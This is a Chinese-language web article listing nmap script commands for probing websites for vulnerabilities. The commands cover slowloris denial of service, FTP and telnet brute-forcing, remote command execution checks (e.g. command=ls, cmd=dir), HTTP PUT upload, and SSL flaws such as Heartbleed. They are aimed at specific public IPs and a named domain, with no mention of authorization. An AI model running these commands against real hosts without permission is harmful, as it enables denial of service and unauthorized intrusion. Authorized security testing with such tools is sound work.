用nmap扫描网站漏洞的命令有:1 Http 拒绝服务nmap –max-parallelism 800–script http-slowloris scanme.nmap.orgIIS 短文件泄露nmap -p 8080 –script
用nmap扫描网站漏洞的命令有:
1 Http 拒绝服务
nmap –max-parallelism 800–script http-slowloris scanme.nmap.org
IIS 短文件泄露
nmap -p 8080 –script http-iis-short-name-brute 61.142.64.176
ftp弱口令暴力破解
nmap –script ftp-brute –script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passWords.txt,brute.threads=3,brute.delay=6 203.195.139.153
检测CVE-2011-2523中的ftp-vsftpd-backdoor
nmap -T2 –script ftp-vsftpd-backdoor 211.139.201.240
验证http中开启的-methods 方法
nmap -T3 –script http-methods –script-args http.test-all=true,http.url-path=/www.haoshangjia.com
验证HTTP.sys 远程代码执行
nmap -sV –script http-vuln-cve2015-1635 203.195.139.153
验证 SSL POODLE infORMation leak
nmap -sV -p 443 –version-light –script ssl-poodle 218.19.141.16
验证http 中开启了put 方法
nmap –script http-put –script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
验证Mysql 匿名访问
nmap –script mysql-empty-password 203.195.139.153
验证cve2015-1427 漏洞
nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153
验证cve2014-8877漏洞
nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128
验证Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞
nmap -p 443 –script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153
nmap –script sshv1,sslv2 www.haoshangjia.com
验证CVE-2014-0224 ssl-ccs-injection
nmap -Pn –script ssl-ccs-injection 203.195.139.153
验证ssl-cert证书问题
nmap -v -v –script ssl-cert 203.195.139.153
验证SSL证书的有限期
nmap -Pn –script ssl-date www.haoshangjia.com
验证CVE-2014-0160 OpenSSL Heartbleed bug
nmap -p 443 –script ssl-heartbleed,ssl-known-key 203.195.139.153
验证 Debian OpenSSL keys
nmap -p 443 –script ssl-known-key 203.195.139.153
验证弱加密SSL套件
nmap –script ssl-enum-ciphers 203.195.139.153
验证CVE 2015-4000
nmap –script ssl-dh-params www.haoshangjia.com
验证多种SSL漏洞问题
nmap 203.195.139.153 –vv –script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-Google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2
在网络中检测某主机是否存在窃听他人流量
nmap –script sniffer-detect 10.10.167.5
暴力破解telnet
nmap -p 23 –script telnet-brute –script-args userdb=myusers.lst,passdb=mypwds.lst –script-args telnet-brute.timeout=8s 203.195.139.153
验证telnet是否支持加密
nmap –script telnet-encryption 203.195.139.153
精准地确认端口上运行的服务
nmap -sV –script unusual-port 42.96.170.128
收集VNC信息
nmap –script vnc-info 203.195.139.153
--结束END--
本文标题: 如何用nmap扫描网站漏洞
本文链接: https://www.lsjlt.com/news/115180.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
官方手机版
微信公众号
商务合作
0